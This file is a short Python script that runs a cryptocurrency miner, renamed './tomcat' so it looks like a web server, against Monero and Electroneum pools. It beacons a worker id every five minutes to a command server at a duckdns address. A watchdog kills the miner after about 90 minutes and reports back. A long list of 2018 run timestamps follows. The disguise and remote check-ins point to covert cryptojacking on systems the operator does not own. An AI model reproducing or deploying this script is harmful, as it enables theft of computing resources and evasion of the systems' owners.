import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:18:05.649368
#2018-02-17 16:07:06.467217
#2018-02-17 17:54:05.710056
#2018-02-17 19:41:01.290510
#2018-02-17 21:28:06.300204
#2018-02-17 23:12:03.819673
#2018-02-18 00:59:04.313397
#2018-02-18 02:47:05.108956
#2018-02-18 04:36:03.746607
#2018-02-18 06:27:06.162417
#2018-02-18 08:16:04.564973
#2018-02-18 10:04:07.098175
#2018-02-18 11:50:09.852350
#2018-02-18 13:35:07.408770
#2018-02-18 15:25:04.126149
#2018-02-18 17:13:07.357067
#2018-02-18 19:01:04.208308
#2018-02-18 20:48:05.158905
#2018-02-18 22:34:06.575542
#2018-02-19 00:22:07.056671
#2018-02-19 02:08:01.994420
#2018-02-19 03:54:04.001674
#2018-02-19 05:39:03.841257
#2018-02-19 07:26:06.664773
#2018-02-19 09:16:08.249647
#2018-02-19 11:05:06.836341
#2018-02-19 12:52:01.279033
#2018-02-19 14:39:07.835907
#2018-02-19 16:28:09.430978
#2018-02-19 18:16:01.618255
#2018-02-19 20:02:07.368750
#2018-02-19 21:50:04.839237
#2018-02-19 23:36:06.824108
#2018-02-20 01:21:06.466720
#2018-02-20 03:11:03.803135
#2018-02-20 04:58:04.571084
#2018-02-20 06:41:05.369275
#2018-02-20 08:26:04.155941
#2018-02-20 10:11:05.584722
#2018-02-20 11:55:09.592840
#2018-02-20 13:42:08.432488
#2018-02-20 15:26:08.870464
#2018-02-20 17:13:04.940935
#2018-02-20 19:04:01.274917
#2018-02-20 20:53:08.146481
#2018-02-20 22:38:07.388688
#2018-02-21 00:21:08.375095
#2018-02-21 02:08:06.856837
#2018-02-21 03:53:06.971301
#2018-02-21 05:40:01.732386
#2018-02-21 07:28:06.429553
#2018-02-21 09:12:02.191320
#2018-02-21 11:00:11.399440
#2018-02-21 12:48:07.222503
#2018-02-21 14:37:08.578738
#2018-02-21 16:23:10.435443
#2018-02-21 18:16:08.733732
#2018-02-21 20:03:04.434731
#2018-02-21 21:50:08.796160
#2018-02-21 23:37:08.183371
#2018-02-22 01:25:07.932228
#2018-02-22 03:13:04.732873
#2018-02-22 05:01:07.725011
#2018-02-22 06:45:01.524825
#2018-02-22 08:34:02.135020
#2018-02-22 10:21:02.007827
#2018-02-22 12:06:06.875823
#2018-02-22 13:51:06.190186
#2018-02-22 15:39:10.436076
#2018-02-22 17:25:08.570369
#2018-02-22 19:13:01.732629
#2018-02-22 21:05:01.512310
#2018-02-22 22:51:03.563265
#2018-02-23 00:38:05.998598
#2018-02-23 02:24:01.829166
#2018-02-23 04:13:04.919606
#2018-02-23 05:58:07.338586
#2018-02-23 07:33:06.851236
#2018-02-23 09:32:07.405560
#2018-02-23 11:19:02.168367
#2018-02-23 12:38:08.317642
#2018-02-23 14:03:05.709555
#2018-02-23 15:40:09.801034
#2018-02-23 17:11:05.129447
#2018-02-23 18:59:07.125424
#2018-02-23 20:35:04.120712
#2018-02-23 22:08:09.237976
#2018-02-23 23:44:09.771373
#2018-02-24 01:20:09.796138
#2018-02-24 02:56:06.371729
#2018-02-24 04:33:04.178666
#2018-02-24 06:00:01.664759
#2018-02-24 07:37:06.325561
#2018-02-24 09:12:05.240594
#2018-02-24 10:37:03.643940
#2018-02-24 12:23:01.652957
#2018-02-24 13:57:06.223425
#2018-02-24 15:30:06.199571
#2018-02-24 17:05:06.136807
#2018-02-24 18:39:04.966696
#2018-02-24 20:10:08.531709
#2018-02-24 21:40:06.921425
#2018-02-25 00:13:04.084307
#2018-02-25 02:19:01.964718
#2018-02-25 05:35:06.291749
#2018-02-25 11:34:06.782731